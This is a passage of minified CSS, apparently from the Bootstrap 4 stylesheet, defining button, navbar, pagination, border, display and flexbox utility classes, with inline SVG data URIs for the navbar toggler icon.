rgba(225,83,97,.5)}.btn-light{color:#212529;background-color:#f8f9fa;border-color:#f8f9fa}.btn-light:hover{color:#212529;background-color:#e2e6ea;border-color:#dae0e5}.btn-light.focus,.btn-light:focus{color:#212529;background-color:#e2e6ea;border-color:#dae0e5;box-shadow:0 0 0 .2rem rgba(216,217,219,.5)}.btn-light.disabled,.btn-light:disabled{color:#212529;background-color:#f8f9fa;border-color:#f8f9fa}.btn-light:not(:disabled):not(.disabled).active,.btn-light:not(:disabled):not(.disabled):active,.show>.btn-light.dropdown-toggle{color:#212529;background-color:#dae0e5;border-color:#d3d9df}.btn-light:not(:disabled):not(.disabled).active:focus,.btn-light:not(:disabled):not(.disabled):active:focus,.show>.btn-light.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(216,217,219,.5)}.btn-dark{color:#fff;background-color:#343a40;border-color:#343a40}.btn-dark:hover{color:#fff;background-color:#23272b;border-color:#1d2124}.btn-dark.focus,.btn-dark:focus{color:#fff;background-color:#23272b;border-color:#1d2124;box-shadow:0 0 0 .2rem rgba(82,88,93,.5)}.btn-dark.disabled,.btn-dark:disabled{color:#fff;background-color:#343a40;border-color:#343a40}.btn-dark:not(:disabled):not(.disabled).active,.btn-dark:not(:disabled):not(.disabled):active,.show>.btn-dark.dropdown-toggle{color:#fff;background-color:#1d2124;border-color:#171a1d}.btn-dark:not(:disabled):not(.disabled).active:focus,.btn-dark:not(:disabled):not(.disabled):active:focus,.show>.btn-dark.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(82,88,93,.5)}.btn-outline-primary{color:#007bff;border-color:#007bff}.btn-outline-primary:hover{color:#fff;background-color:#007bff;border-color:#007bff}.btn-outline-primary.focus,.btn-outline-primary:focus{box-shadow:0 0 0 .2rem rgba(0,123,255,.5)}.btn-outline-primary.disabled,.btn-outline-primary:disabled{color:#007bff;background-color:transparent}.btn-outline-primary:not(:disabled):not(.disabled).active,.btn-outline-primary:not(:disabled):not(.disabled):active,.show>.btn-outline-primary.dropdown-toggle{color:#fff;background-color:#007bff;border-color:#007bff}.btn-outline-primary:not(:disabled):not(.disabled).active:focus,.btn-outline-primary:not(:disabled):not(.disabled):active:focus,.show>.btn-outline-primary.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(0,123,255,.5)}.btn-outline-secondary{color:#6c757d;border-color:#6c757d}.btn-outline-secondary:hover{color:#fff;background-color:#6c757d;border-color:#6c757d}.btn-outline-secondary.focus,.btn-outline-secondary:focus{box-shadow:0 0 0 .2rem rgba(108,117,125,.5)}.btn-outline-secondary.disabled,.btn-outline-secondary:disabled{color:#6c757d;background-color:transparent}.btn-outline-secondary:not(:disabled):not(.disabled).active,.btn-outline-secondary:not(:disabled):not(.disabled):active,.show>.btn-outline-secondary.dropdown-toggle{color:#fff;background-color:#6c757d;border-color:#6c757d}.btn-outline-secondary:not(:disabled):not(.disabled).active:focus,.btn-outline-secondary:not(:disabled):not(.disabled):active:focus,.show>.btn-outline-secondary.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(108,117,125,.5)}.btn-outline-success{color:#28a745;border-color:#28a745}.btn-outline-success:hover{color:#fff;background-color:#28a745;border-color:#28a745}.btn-outline-success.focus,.btn-outline-success:focus{box-shadow:0 0 0 .2rem rgba(40,167,69,.5)}.btn-outline-success.disabled,.btn-outline-success:disabled{color:#28a745;background-color:transparent}.btn-outline-success:not(:disabled):not(.disabled).active,.btn-outline-success:not(:disabled):not(.disabled):active,.show>.btn-outline-success.dropdown-toggle{color:#fff;background-color:#28a745;border-color:#28a745}.btn-outline-success:not(:disabled):not(.disabled).active:focus,.btn-outline-success:not(:disabled):not(.disabled):active:focus,.show>.btn-outline-success.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(40,167,69,.5)}.btn-outline-info{color:#17a2b8;border-color:#17a2b8}.btn-outline-info:hover{color:#fff;background-color:#17a2b8;border-color:#17a2b8}.btn-outline-info.focus,.btn-outline-info:focus{box-shadow:0 0 0 .2rem rgba(23,162,184,.5)}.btn-outline-info.disabled,.btn-outline-info:disabled{color:#17a2b8;background-color:transparent}.btn-outline-info:not(:disabled):not(.disabled).active,.btn-outline-info:not(:disabled):not(.disabled):active,.show>.btn-outline-info.dropdown-toggle{color:#fff;background-color:#17a2b8;border-color:#17a2b8}.btn-outline-info:not(:disabled):not(.disabled).active:focus,.btn-outline-info:not(:disabled):not(.disabled):active:focus,.show>.btn-outline-info.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(23,162,184,.5)}.btn-outline-warning{color:#ffc107;border-color:#ffc107}.btn-outline-warning:hover{color:#212529;background-color:#ffc107;border-color:#ffc107}.btn-outline-warning.focus,.btn-outline-warning:focus{box-shadow:0 0 0 .2rem rgba(255,193,7,.5)}.btn-outline-warning.disabled,.btn-outline-warning:disabled{color:#ffc107;background-color:transparent}.btn-outline-warning:not(:disabled):not(.disabled).active,.btn-outline-warning:not(:disabled):not(.disabled):active,.show>.btn-outline-warning.dropdown-toggle{color:#212529;background-color:#ffc107;border-color:#ffc107}.btn-outline-warning:not(:disabled):not(.disabled).active:focus,.btn-outline-warning:not(:disabled):not(.disabled):active:focus,.show>.btn-outline-warning.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(255,193,7,.5)}.btn-outline-danger{color:#dc3545;border-color:#dc3545}.btn-outline-danger:hover{color:#fff;background-color:#dc3545;border-color:#dc3545}.btn-outline-danger.focus,.btn-outline-danger:focus{box-shadow:0 0 0 .2rem rgba(220,53,69,.5)}.btn-outline-danger.disabled,.btn-outline-danger:disabled{color:#dc3545;background-color:transparent}.btn-outline-danger:not(:disabled):not(.disabled).active,.btn-outline-danger:not(:disabled):not(.disabled):active,.show>.btn-outline-danger.dropdown-toggle{color:#fff;background-color:#dc3545;border-color:#dc3545}.btn-outline-danger:not(:disabled):not(.disabled).active:focus,.btn-outline-danger:not(:disabled):not(.disabled):active:focus,.show>.btn-outline-danger.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(220,53,69,.5)}.btn-outline-light{color:#f8f9fa;border-color:#f8f9fa}.btn-outline-light:hover{color:#212529;background-color:#f8f9fa;border-color:#f8f9fa}.btn-outline-light.focus,.btn-outline-light:focus{box-shadow:0 0 0 .2rem rgba(248,249,250,.5)}.btn-outline-light.disabled,.btn-outline-light:disabled{color:#f8f9fa;background-color:transparent}.btn-outline-light:not(:disabled):not(.disabled).active,.btn-outline-light:not(:disabled):not(.disabled):active,.show>.btn-outline-light.dropdown-toggle{color:#212529;background-color:#f8f9fa;border-color:#f8f9fa}.btn-outline-light:not(:disabled):not(.disabled).active:focus,.btn-outline-light:not(:disabled):not(.disabled):active:focus,.show>.btn-outline-light.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(248,249,250,.5)}.btn-outline-dark{color:#343a40;border-color:#343a40}.btn-outline-dark:hover{color:#fff;background-color:#343a40;border-color:#343a40}.btn-outline-dark.focus,.btn-outline-dark:focus{box-shadow:0 0 0 .2rem rgba(52,58,64,.5)}.btn-outline-dark.disabled,.btn-outline-dark:disabled{color:#343a40;background-color:transparent}.btn-outline-dark:not(:disabled):not(.disabled).active,.btn-outline-dark:not(:disabled):not(.disabled):active,.show>.btn-outline-dark.dropdown-toggle{color:#fff;background-color:#343a40;border-color:#343a40}.btn-outline-dark:not(:disabled):not(.disabled).active:focus,.btn-outline-dark:not(:disabled):not(.disabled):active:focus,.show>.btn-outline-dark.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(52,58,64,.5)}.btn-link{font-weight:400;color:#007bff;text-decoration:none}.btn-link:hover{color:#0056b3;text-decoration:underline}.btn-link.focus,.btn-link:focus{text-decoration:underline}.btn-link.disabled,.btn-link:disabled{color:#6c757d;pointer-events:none}.btn-lg{padding:.5rem 1rem;font-size:1.25rem;line-height:1.5;border-radius:.3rem}.btn-sm{padding:.25rem .5rem;font-size:.875rem;line-height:1.5;border-radius:.2rem}.btn-block{display:block;width:100%}.btn-block+.btn-block{margin-top:.5rem}input[type=button].btn-block,input[type=reset].btn-block,input[type=submit].btn-block{width:100%}.nav{display:flex;flex-wrap:wrap;padding-left:0;margin-bottom:0;list-style:none}.nav-link{display:block;padding:.5rem 1rem}.nav-link:focus,.nav-link:hover{text-decoration:none}.nav-link.disabled{color:#6c757d;pointer-events:none;cursor:default}.nav-tabs{border-bottom:1px solid #dee2e6}.nav-tabs .nav-link{margin-bottom:-1px;background-color:transparent;border:1px solid transparent;border-top-left-radius:.25rem;border-top-right-radius:.25rem}.nav-tabs .nav-link:focus,.nav-tabs .nav-link:hover{isolation:isolate;border-color:#e9ecef #e9ecef #dee2e6}.nav-tabs .nav-link.disabled{color:#6c757d;background-color:transparent;border-color:transparent}.nav-tabs .nav-item.show .nav-link,.nav-tabs .nav-link.active{color:#495057;background-color:#fff;border-color:#dee2e6 #dee2e6 #fff}.nav-tabs .dropdown-menu{margin-top:-1px;border-top-left-radius:0;border-top-right-radius:0}.nav-pills .nav-link{background:0 0;border:0;border-radius:.25rem}.nav-pills .nav-link.active,.nav-pills .show>.nav-link{color:#fff;background-color:#007bff}.nav-fill .nav-item,.nav-fill>.nav-link{flex:1 1 auto;text-align:center}.nav-justified .nav-item,.nav-justified>.nav-link{flex-basis:0;flex-grow:1;text-align:center}.tab-content>.tab-pane{display:none}.tab-content>.active{display:block}.navbar{position:relative;display:flex;flex-wrap:wrap;align-items:center;justify-content:space-between;padding:.5rem 1rem}.navbar .container,.navbar .container-fluid,.navbar .container-lg,.navbar .container-md,.navbar .container-sm,.navbar .container-xl{display:flex;flex-wrap:wrap;align-items:center;justify-content:space-between}.navbar-brand{display:inline-block;padding-top:.3125rem;padding-bottom:.3125rem;margin-right:1rem;font-size:1.25rem;line-height:inherit;white-space:nowrap}.navbar-brand:focus,.navbar-brand:hover{text-decoration:none}.navbar-nav{display:flex;flex-direction:column;padding-left:0;margin-bottom:0;list-style:none}.navbar-nav .nav-link{padding-right:0;padding-left:0}.navbar-nav .dropdown-menu{position:static;float:none}.navbar-text{display:inline-block;padding-top:.5rem;padding-bottom:.5rem}.navbar-collapse{flex-basis:100%;flex-grow:1;align-items:center}.navbar-toggler{padding:.25rem .75rem;font-size:1.25rem;line-height:1;background-color:transparent;border:1px solid transparent;border-radius:.25rem}.navbar-toggler:focus,.navbar-toggler:hover{text-decoration:none}.navbar-toggler-icon{display:inline-block;width:1.5em;height:1.5em;vertical-align:middle;content:"";background:50%/100% 100% no-repeat}.navbar-nav-scroll{max-height:75vh;overflow-y:auto}@media (max-width:575.98px){.navbar-expand-sm>.container,.navbar-expand-sm>.container-fluid,.navbar-expand-sm>.container-lg,.navbar-expand-sm>.container-md,.navbar-expand-sm>.container-sm,.navbar-expand-sm>.container-xl{padding-right:0;padding-left:0}}@media (min-width:576px){.navbar-expand-sm{flex-flow:row nowrap;justify-content:flex-start}.navbar-expand-sm .navbar-nav{flex-direction:row}.navbar-expand-sm .navbar-nav .dropdown-menu{position:absolute}.navbar-expand-sm .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.navbar-expand-sm>.container,.navbar-expand-sm>.container-fluid,.navbar-expand-sm>.container-lg,.navbar-expand-sm>.container-md,.navbar-expand-sm>.container-sm,.navbar-expand-sm>.container-xl{flex-wrap:nowrap}.navbar-expand-sm .navbar-nav-scroll{overflow:visible}.navbar-expand-sm .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand-sm .navbar-toggler{display:none}}@media (max-width:767.98px){.navbar-expand-md>.container,.navbar-expand-md>.container-fluid,.navbar-expand-md>.container-lg,.navbar-expand-md>.container-md,.navbar-expand-md>.container-sm,.navbar-expand-md>.container-xl{padding-right:0;padding-left:0}}@media (min-width:768px){.navbar-expand-md{flex-flow:row nowrap;justify-content:flex-start}.navbar-expand-md .navbar-nav{flex-direction:row}.navbar-expand-md .navbar-nav .dropdown-menu{position:absolute}.navbar-expand-md .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.navbar-expand-md>.container,.navbar-expand-md>.container-fluid,.navbar-expand-md>.container-lg,.navbar-expand-md>.container-md,.navbar-expand-md>.container-sm,.navbar-expand-md>.container-xl{flex-wrap:nowrap}.navbar-expand-md .navbar-nav-scroll{overflow:visible}.navbar-expand-md .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand-md .navbar-toggler{display:none}}@media (max-width:991.98px){.navbar-expand-lg>.container,.navbar-expand-lg>.container-fluid,.navbar-expand-lg>.container-lg,.navbar-expand-lg>.container-md,.navbar-expand-lg>.container-sm,.navbar-expand-lg>.container-xl{padding-right:0;padding-left:0}}@media (min-width:992px){.navbar-expand-lg{flex-flow:row nowrap;justify-content:flex-start}.navbar-expand-lg .navbar-nav{flex-direction:row}.navbar-expand-lg .navbar-nav .dropdown-menu{position:absolute}.navbar-expand-lg .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.navbar-expand-lg>.container,.navbar-expand-lg>.container-fluid,.navbar-expand-lg>.container-lg,.navbar-expand-lg>.container-md,.navbar-expand-lg>.container-sm,.navbar-expand-lg>.container-xl{flex-wrap:nowrap}.navbar-expand-lg .navbar-nav-scroll{overflow:visible}.navbar-expand-lg .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand-lg .navbar-toggler{display:none}}@media (max-width:1199.98px){.navbar-expand-xl>.container,.navbar-expand-xl>.container-fluid,.navbar-expand-xl>.container-lg,.navbar-expand-xl>.container-md,.navbar-expand-xl>.container-sm,.navbar-expand-xl>.container-xl{padding-right:0;padding-left:0}}@media (min-width:1200px){.navbar-expand-xl{flex-flow:row nowrap;justify-content:flex-start}.navbar-expand-xl .navbar-nav{flex-direction:row}.navbar-expand-xl .navbar-nav .dropdown-menu{position:absolute}.navbar-expand-xl .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.navbar-expand-xl>.container,.navbar-expand-xl>.container-fluid,.navbar-expand-xl>.container-lg,.navbar-expand-xl>.container-md,.navbar-expand-xl>.container-sm,.navbar-expand-xl>.container-xl{flex-wrap:nowrap}.navbar-expand-xl .navbar-nav-scroll{overflow:visible}.navbar-expand-xl .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand-xl .navbar-toggler{display:none}}.navbar-expand{flex-flow:row nowrap;justify-content:flex-start}.navbar-expand>.container,.navbar-expand>.container-fluid,.navbar-expand>.container-lg,.navbar-expand>.container-md,.navbar-expand>.container-sm,.navbar-expand>.container-xl{padding-right:0;padding-left:0}.navbar-expand .navbar-nav{flex-direction:row}.navbar-expand .navbar-nav .dropdown-menu{position:absolute}.navbar-expand .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.navbar-expand>.container,.navbar-expand>.container-fluid,.navbar-expand>.container-lg,.navbar-expand>.container-md,.navbar-expand>.container-sm,.navbar-expand>.container-xl{flex-wrap:nowrap}.navbar-expand .navbar-nav-scroll{overflow:visible}.navbar-expand .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand .navbar-toggler{display:none}.navbar-light .navbar-brand{color:rgba(0,0,0,.9)}.navbar-light .navbar-brand:focus,.navbar-light .navbar-brand:hover{color:rgba(0,0,0,.9)}.navbar-light .navbar-nav .nav-link{color:rgba(0,0,0,.5)}.navbar-light .navbar-nav .nav-link:focus,.navbar-light .navbar-nav .nav-link:hover{color:rgba(0,0,0,.7)}.navbar-light .navbar-nav .nav-link.disabled{color:rgba(0,0,0,.3)}.navbar-light .navbar-nav .active>.nav-link,.navbar-light .navbar-nav .nav-link.active,.navbar-light .navbar-nav .nav-link.show,.navbar-light .navbar-nav .show>.nav-link{color:rgba(0,0,0,.9)}.navbar-light .navbar-toggler{color:rgba(0,0,0,.5);border-color:rgba(0,0,0,.1)}.navbar-light .navbar-toggler-icon{background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='30' height='30' viewBox='0 0 30 30'%3e%3cpath stroke='rgba%280, 0, 0, 0.5%29' stroke-linecap='round' stroke-miterlimit='10' stroke-width='2' d='M4 7h22M4 15h22M4 23h22'/%3e%3c/svg%3e")}.navbar-light .navbar-text{color:rgba(0,0,0,.5)}.navbar-light .navbar-text a{color:rgba(0,0,0,.9)}.navbar-light .navbar-text a:focus,.navbar-light .navbar-text a:hover{color:rgba(0,0,0,.9)}.navbar-dark .navbar-brand{color:#fff}.navbar-dark .navbar-brand:focus,.navbar-dark .navbar-brand:hover{color:#fff}.navbar-dark .navbar-nav .nav-link{color:rgba(255,255,255,.5)}.navbar-dark .navbar-nav .nav-link:focus,.navbar-dark .navbar-nav .nav-link:hover{color:rgba(255,255,255,.75)}.navbar-dark .navbar-nav .nav-link.disabled{color:rgba(255,255,255,.25)}.navbar-dark .navbar-nav .active>.nav-link,.navbar-dark .navbar-nav .nav-link.active,.navbar-dark .navbar-nav .nav-link.show,.navbar-dark .navbar-nav .show>.nav-link{color:#fff}.navbar-dark .navbar-toggler{color:rgba(255,255,255,.5);border-color:rgba(255,255,255,.1)}.navbar-dark .navbar-toggler-icon{background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='30' height='30' viewBox='0 0 30 30'%3e%3cpath stroke='rgba%28255, 255, 255, 0.5%29' stroke-linecap='round' stroke-miterlimit='10' stroke-width='2' d='M4 7h22M4 15h22M4 23h22'/%3e%3c/svg%3e")}.navbar-dark .navbar-text{color:rgba(255,255,255,.5)}.navbar-dark .navbar-text a{color:#fff}.navbar-dark .navbar-text a:focus,.navbar-dark .navbar-text a:hover{color:#fff}.pagination{display:flex;padding-left:0;list-style:none;border-radius:.25rem}.page-link{position:relative;display:block;padding:.5rem .75rem;margin-left:-1px;line-height:1.25;color:#007bff;background-color:#fff;border:1px solid #dee2e6}.page-link:hover{z-index:2;color:#0056b3;text-decoration:none;background-color:#e9ecef;border-color:#dee2e6}.page-link:focus{z-index:3;outline:0;box-shadow:0 0 0 .2rem rgba(0,123,255,.25)}.page-item:first-child .page-link{margin-left:0;border-top-left-radius:.25rem;border-bottom-left-radius:.25rem}.page-item:last-child .page-link{border-top-right-radius:.25rem;border-bottom-right-radius:.25rem}.page-item.active .page-link{z-index:3;color:#fff;background-color:#007bff;border-color:#007bff}.page-item.disabled .page-link{color:#6c757d;pointer-events:none;cursor:auto;background-color:#fff;border-color:#dee2e6}.pagination-lg .page-link{padding:.75rem 1.5rem;font-size:1.25rem;line-height:1.5}.pagination-lg .page-item:first-child .page-link{border-top-left-radius:.3rem;border-bottom-left-radius:.3rem}.pagination-lg .page-item:last-child .page-link{border-top-right-radius:.3rem;border-bottom-right-radius:.3rem}.pagination-sm .page-link{padding:.25rem .5rem;font-size:.875rem;line-height:1.5}.pagination-sm .page-item:first-child .page-link{border-top-left-radius:.2rem;border-bottom-left-radius:.2rem}.pagination-sm .page-item:last-child .page-link{border-top-right-radius:.2rem;border-bottom-right-radius:.2rem}.align-baseline{vertical-align:baseline!important}.align-top{vertical-align:top!important}.align-middle{vertical-align:middle!important}.align-bottom{vertical-align:bottom!important}.align-text-bottom{vertical-align:text-bottom!important}.align-text-top{vertical-align:text-top!important}.bg-primary{background-color:#007bff!important}a.bg-primary:focus,a.bg-primary:hover,button.bg-primary:focus,button.bg-primary:hover{background-color:#0062cc!important}.bg-secondary{background-color:#6c757d!important}a.bg-secondary:focus,a.bg-secondary:hover,button.bg-secondary:focus,button.bg-secondary:hover{background-color:#545b62!important}.bg-success{background-color:#28a745!important}a.bg-success:focus,a.bg-success:hover,button.bg-success:focus,button.bg-success:hover{background-color:#1e7e34!important}.bg-info{background-color:#17a2b8!important}a.bg-info:focus,a.bg-info:hover,button.bg-info:focus,button.bg-info:hover{background-color:#117a8b!important}.bg-warning{background-color:#ffc107!important}a.bg-warning:focus,a.bg-warning:hover,button.bg-warning:focus,button.bg-warning:hover{background-color:#d39e00!important}.bg-danger{background-color:#dc3545!important}a.bg-danger:focus,a.bg-danger:hover,button.bg-danger:focus,button.bg-danger:hover{background-color:#bd2130!important}.bg-light{background-color:#f8f9fa!important}a.bg-light:focus,a.bg-light:hover,button.bg-light:focus,button.bg-light:hover{background-color:#dae0e5!important}.bg-dark{background-color:#343a40!important}a.bg-dark:focus,a.bg-dark:hover,button.bg-dark:focus,button.bg-dark:hover{background-color:#1d2124!important}.bg-white{background-color:#fff!important}.bg-transparent{background-color:transparent!important}.border{border:1px solid #dee2e6!important}.border-top{border-top:1px solid #dee2e6!important}.border-right{border-right:1px solid #dee2e6!important}.border-bottom{border-bottom:1px solid #dee2e6!important}.border-left{border-left:1px solid #dee2e6!important}.border-0{border:0!important}.border-top-0{border-top:0!important}.border-right-0{border-right:0!important}.border-bottom-0{border-bottom:0!important}.border-left-0{border-left:0!important}.border-primary{border-color:#007bff!important}.border-secondary{border-color:#6c757d!important}.border-success{border-color:#28a745!important}.border-info{border-color:#17a2b8!important}.border-warning{border-color:#ffc107!important}.border-danger{border-color:#dc3545!important}.border-light{border-color:#f8f9fa!important}.border-dark{border-color:#343a40!important}.border-white{border-color:#fff!important}.rounded-sm{border-radius:.2rem!important}.rounded{border-radius:.25rem!important}.rounded-top{border-top-left-radius:.25rem!important;border-top-right-radius:.25rem!important}.rounded-right{border-top-right-radius:.25rem!important;border-bottom-right-radius:.25rem!important}.rounded-bottom{border-bottom-right-radius:.25rem!important;border-bottom-left-radius:.25rem!important}.rounded-left{border-top-left-radius:.25rem!important;border-bottom-left-radius:.25rem!important}.rounded-lg{border-radius:.3rem!important}.rounded-circle{border-radius:50%!important}.rounded-pill{border-radius:50rem!important}.rounded-0{border-radius:0!important}.clearfix::after{display:block;clear:both;content:""}.d-none{display:none!important}.d-inline{display:inline!important}.d-inline-block{display:inline-block!important}.d-block{display:block!important}.d-table{display:table!important}.d-table-row{display:table-row!important}.d-table-cell{display:table-cell!important}.d-flex{display:flex!important}.d-inline-flex{display:inline-flex!important}@media (min-width:576px){.d-sm-none{display:none!important}.d-sm-inline{display:inline!important}.d-sm-inline-block{display:inline-block!important}.d-sm-block{display:block!important}.d-sm-table{display:table!important}.d-sm-table-row{display:table-row!important}.d-sm-table-cell{display:table-cell!important}.d-sm-flex{display:flex!important}.d-sm-inline-flex{display:inline-flex!important}}@media (min-width:768px){.d-md-none{display:none!important}.d-md-inline{display:inline!important}.d-md-inline-block{display:inline-block!important}.d-md-block{display:block!important}.d-md-table{display:table!important}.d-md-table-row{display:table-row!important}.d-md-table-cell{display:table-cell!important}.d-md-flex{display:flex!important}.d-md-inline-flex{display:inline-flex!important}}@media (min-width:992px){.d-lg-none{display:none!important}.d-lg-inline{display:inline!important}.d-lg-inline-block{display:inline-block!important}.d-lg-block{display:block!important}.d-lg-table{display:table!important}.d-lg-table-row{display:table-row!important}.d-lg-table-cell{display:table-cell!important}.d-lg-flex{display:flex!important}.d-lg-inline-flex{display:inline-flex!important}}@media (min-width:1200px){.d-xl-none{display:none!important}.d-xl-inline{display:inline!important}.d-xl-inline-block{display:inline-block!important}.d-xl-block{display:block!important}.d-xl-table{display:table!important}.d-xl-table-row{display:table-row!important}.d-xl-table-cell{display:table-cell!important}.d-xl-flex{display:flex!important}.d-xl-inline-flex{display:inline-flex!important}}@media print{.d-print-none{display:none!important}.d-print-inline{display:inline!important}.d-print-inline-block{display:inline-block!important}.d-print-block{display:block!important}.d-print-table{display:table!important}.d-print-table-row{display:table-row!important}.d-print-table-cell{display:table-cell!important}.d-print-flex{display:flex!important}.d-print-inline-flex{display:inline-flex!important}}.embed-responsive{position:relative;display:block;width:100%;padding:0;overflow:hidden}.embed-responsive::before{display:block;content:""}.embed-responsive .embed-responsive-item,.embed-responsive embed,.embed-responsive iframe,.embed-responsive object,.embed-responsive video{position:absolute;top:0;bottom:0;left:0;width:100%;height:100%;border:0}.embed-responsive-21by9::before{padding-top:42.85714286%}.embed-responsive-16by9::before{padding-top:56.25%}.embed-responsive-4by3::before{padding-top:75%}.embed-responsive-1by1::before{padding-top:100%}.flex-row{flex-direction:row!important}.flex-column{flex-direction:column!important}.flex-row-reverse{flex-direction:row-reverse!important}.flex-column-reverse{flex-direction:column-reverse!important}.flex-wrap{flex-wrap:wrap!important}.flex-nowrap{flex-wrap:nowrap!important}.flex-wrap-reverse{flex-wrap:wrap-reverse!important}.flex-fill{flex:1 1 auto!important}.flex-grow-0{flex-grow:0!important}.flex-grow-1{flex-grow:1!important}.flex-shrink-0{flex-shrink:0!important}.flex-shrink-1{flex-shrink:1!important}.justify-content-start{justify-content:flex-start!important}.justify-content-end{justify-content:flex-end!important}.justify-content-center{justify-content:center!important}.justify-content-between{justify-content:space-between!important}.justify-content-around{justify-content:space-around!important}.align-items-start{align-items:flex-start!important}.align-items-end{align-items:flex-end!important}.align-items-center{align-items:center!important}.align-items-baseline{align-items:baseline!important}.align-items-stretch{align-items:stretch!important}.align-content-start{align-content:flex-start!important}.align-content-end{align-content:flex-end!important}.align-content-center{align-content:center!important}.align-content-between{align-content:space-between!important}.align-content-around{align-content:space-around!important}.align-content-stretch{align-content:stretch!important}.align-self-auto{align-self:auto!important}.align-self-start{align-self:flex-start!important}.align-self-end{align-self:flex-end!important}.align-self-center{align-self:center!important}.align-self-baseline{align-self:baseline!important}.align-self-stretch{align-self:stretch!important}@media (min-width:576px){.flex-sm-row{flex-direction:row!important}.flex-sm-column{flex-direction:column!important}.flex-sm-row-reverse{flex-direction:row-reverse!important}.flex-sm-column-reverse{flex-direction:column-reverse!important}.flex-sm-wrap{flex-wrap:wrap!important}.flex-sm-nowrap{flex-wrap:nowrap!important}.flex-sm-wrap-reverse{flex-wrap:wrap-reverse!important}.flex-sm-fill{flex:1 1 auto!important}.flex-sm-grow-0{flex-grow:0!important}.flex-sm-grow-1{flex-grow:1!important}.flex-sm-shrink-0{flex-shrink:0!important}.flex-sm-shrink-1{flex-shrink:1!important}.justify-content-sm-start{justify-content:flex-start!important}.justify-content-sm-end{justify-content:flex-end!important}.justify-content-sm-center{justify-content:center!important}.justify-content-sm-between{justify-content:space-between!important}.justify-content-sm-around{justify-content:space-around!important}.align-items-sm-start{align-items:flex-start!important}.align-items-sm-end{align-items:flex-end!important}.align-items-sm-center{align-items:center!important}.align-items-sm-baseline{align-items:baseline!important}.align-items-sm-stretch{align-items:stretch!important}.align-content-sm-start{align-content:flex-start!important}.align-content-sm-end{align-content:flex-end!important}.align-content-sm-center{align-content:center!important}.align-content-sm-between{align-content:space-between!important}.align-content-sm-around{align-content:space-around!important}.align-content-sm-stretch{align-content:stretch!important}.align-self-sm-auto{align-self:auto!important}.align-self-sm-start{align-self:flex-start!important}.align-self-sm-end{align-self:flex-end!important}.align-self-sm-center{align-self:center!important}.align-self-sm-baseline{align-self:baseline!important}.align-self-sm-stretch{align-self:stretch!important}}@media (min-width:768px){.flex-md-row{flex-direction:row!important}.flex-md-column{flex-direction:column!important}.flex-md-row-reverse{flex-direction:row-reverse!important}.flex-md-column-reverse{flex-direction:column-reverse!important}.flex-md-wrap{flex-wrap:wrap!important}.flex-md-nowrap{flex-wrap:nowrap!important}.flex-md-wrap-reverse{flex-wrap:wrap-reverse!important}.flex-md-fill{flex:1 1 auto!important}.flex-md-grow-0{flex-grow:0!important}.flex-md-grow-1{flex-grow:1!important}.flex-md-shrink-0{flex-shrink:0!important}.flex-md-shrink-1{flex-shrink:1!important}.justify-content-md-start{justify-content:flex-start!important}.justify-content-md-end{justify-content:flex-end!important}.justify-content-md-center{justify-content:center!important}.justify-content-md-between{justify-content:space-between!important}.justify-content-md-around{justify-content:space-around!important}.align-items-md-start{align-items:flex-start!important}.align-items-md-end{align-items:flex-end!important}.align-items-md-center{align-items:center!important}.align-items-md-baseline{align-items:baseline!important}.align-items-md-stretch{align-items:stretch!important}.align-content-md-start{align-content:flex-start!important}.align-content-md-end{align-content:flex-end!important}.align-content-md-center{align-content:center!important}.align-content-md-between{align-content:space-between!important}.align-content-md-around{align-content:space-around!important}.align-content-md-stretch{align-content:stretch!important}.align-self-md-auto{align-self:auto!important}.align-self-md-start{align-self:flex-start!important}.align-self-md-end{align-self:flex-end!important}.align-self-md-center{align-self:center!important}.align-self-md-baseline{align-self:baseline!important}.align-self-md-stretch{align-self:stretch!important}}@media (min-width:992px){.flex-lg-row{flex-direction:row!important}.flex-lg-column{flex-direction:column!important}.flex-lg-row-reverse{flex-direction:row-reverse!important}.flex-lg-column-reverse{flex-direction:column-reverse!important}.flex-lg-wrap{flex-wrap:wrap!important}.flex-lg-nowrap{flex-wrap:nowrap!important}.flex-lg-wrap-reverse{flex-wrap:wrap-reverse!important}.flex-lg-fill{flex:1 1 auto!important}.flex-lg-grow-0{flex-grow:0!important}.flex-lg-grow-1{flex-grow:1!important}.flex-lg-shrink-0{flex-shrink:0!important}.flex-lg-shrink-1{flex-shrink:1!important}.justify-content-lg-start{justify-content:flex-start!important}.justify-content-lg-end{justify-content:flex-end!important}.justify-content-lg-center{justify-content:center!important}.justify-content-lg-between{justify-content:space-between!important}.justify-content-lg-around{justify-content:space-around!important}.align-items-lg-start{align-items:flex-start!important}.align-items-lg-end{align-items:flex-end!important}.align-items-lg-center{align-items:center!important}.align-items-lg-baseline{align-items:baseline!important}.align-items-lg-stretch{align-items:stretch!important}.align-content-lg-start{align-content:flex-start!important}.align-content-lg-end{align-content:flex-end!important}.align-content-lg-center{align-content:center!important}.align-content-lg-between{align-content:space-between!important}.align-content-lg-around{align-content:space-around!important}.align-content-lg-stretch{align-content:stretch!important}.align-self-lg-auto{align-self:auto!important}.align-self-lg-start{align-self:flex-start!important}.align-self-lg-end{align-self:flex-end!important}.align-self-lg-center{align-self:center!important}.align-self-lg-baseline{align-self:baseline!important}.align-self-lg-stretch{align-self:stretch!important}}@media 